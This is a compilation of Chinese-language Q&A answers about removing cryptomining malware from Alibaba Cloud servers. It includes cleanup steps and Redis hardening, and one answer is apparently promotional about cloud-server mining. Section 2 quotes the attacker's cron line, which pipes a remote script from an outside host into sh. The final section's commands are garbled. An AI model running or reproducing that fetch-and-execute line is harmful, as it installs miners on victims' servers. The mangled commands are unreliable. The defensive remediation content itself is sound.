阿里雲提示挖礦程序

㈠ 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

㈡ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

㈢ 阿里雲windows伺服器中了挖礦的病毒怎麼清理

光刪除沒用的，因為沒有解決好漏洞。
建議是重做系統，然後找護衛神給你做一下系統安全加固，把漏洞徹底堵住才有效果。

㈣ 阿里雲允許用雲主機挖礦嗎

是可以的。很多挖礦項目都可以使用雲伺服器，例如最近火熱的Swarm bzz。但Swarm白皮書沒有提供挖礦的硬體配置推薦，然而目前，因為各類硬體采購價格高、到貨慢，然而時間不等人！綜合對比下來，針對BZZ挖礦，推薦雲伺服器！
像Swarm BZZ這樣的去中心化存儲的情況下，以太坊生態中的熱點數據每秒都在隨時被調用和存儲，所以除了CPU、內存和硬碟這三個主要的響應能力之外，還有一個要求寬頻傳輸速度。
使用雲伺服器來部署bzz節點，核心理由就是一個字「快」，節點早一分鍾上線，就能更早的獲取到頭礦！
經西部數碼上千bzz節點部署的實踐經驗證明，bzz節點需要較高的帶寬和超強的磁碟IO性能，以下是結合資源實際消耗情況合理搭配的配置。
4核CPU + 4G內存 + 100G SSD硬碟 + 20M帶寬。上述配置，可以部署一個節點。
如果需要部署多節點可以選擇多台這樣的雲伺服器，或者選擇更高配置的雲伺服器，如16核CPU + 24G內存 + 500G SSD硬碟 + 200M帶寬，可部署5-10個節點。

㈤ 為什麼我用流量礦石挖礦一直顯示，程序初始化.准備挖礦數據

需要先緩存挖礦數據才能上傳流量產生礦石。。。資深礦工勸你放棄。。。求採納。。。我一天幾十KG，現在。。一天才一點。。。。沒意思了

㈥ 為啥挖不了比特幣了今天中午明明還可以的，從十點鍾開始運行挖礦程序了，重試了好多次，魚池一隻顯示我

可能是算力比不上別人了唄，都被別人挖走了。比特幣經歷了電腦CPU挖礦 -> 電腦顯卡挖礦 -> 專業礦機挖礦幾個階段，現在普通電腦挖礦都比較難了，除非是投資專門的挖礦設備。但是劃不來。現在挖礦都相對專業化，流量礦石也是，肯定是專業礦機更好，不過如果有緩存，流量礦石的普通礦機還是可以挖一挖。

㈦ 收到挖礦簡訊什麼意思

指瀏覽不良網站背後的黑客會通過程序竊取你的個人信息。
這個時候備份重要的數據和照片之後恢復出廠設置吧，不要安裝不明來源的應用，另外許可權設置里也盡量不要授權。

㈧ windows伺服器的挖礦進程怎麼關閉刪除

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後，使用裡面的病毒查殺功能，直接就可以查殺這種電腦病毒了

㈨ 如何把右下角挖礦測試去除

一種是使用雲安全中心自動清理，另一種是手動清除。登錄到雲安全中心控制台左側欄，選擇威脅檢測，安全告警處理在安全告警處理列表中，找到挖礦程序，然後點處理雲安全中心安全告警處理然後根據提示一步步操作即可。

去除的方法

手動清除挖礦程序護雲盾以Linux伺服器為例，按照以下步驟排查及處理查看挖礦進程的執行PID，命令表示該進程的PID。清除挖礦進程的執行文件，在高CPU消耗的進程中定位到挖礦進程，並殺死該進程。

檢查雲伺服器的防火牆中是否存在挖礦程序的礦池地址，可疑通信地址和開放埠，命令iptablesLn執行以下命令清除惡意礦池地址vietcsysconfigiptables排查是否存在定時任務crontabl根據排查的結果，對可疑的定時任務文件進行清理，防止二次入侵。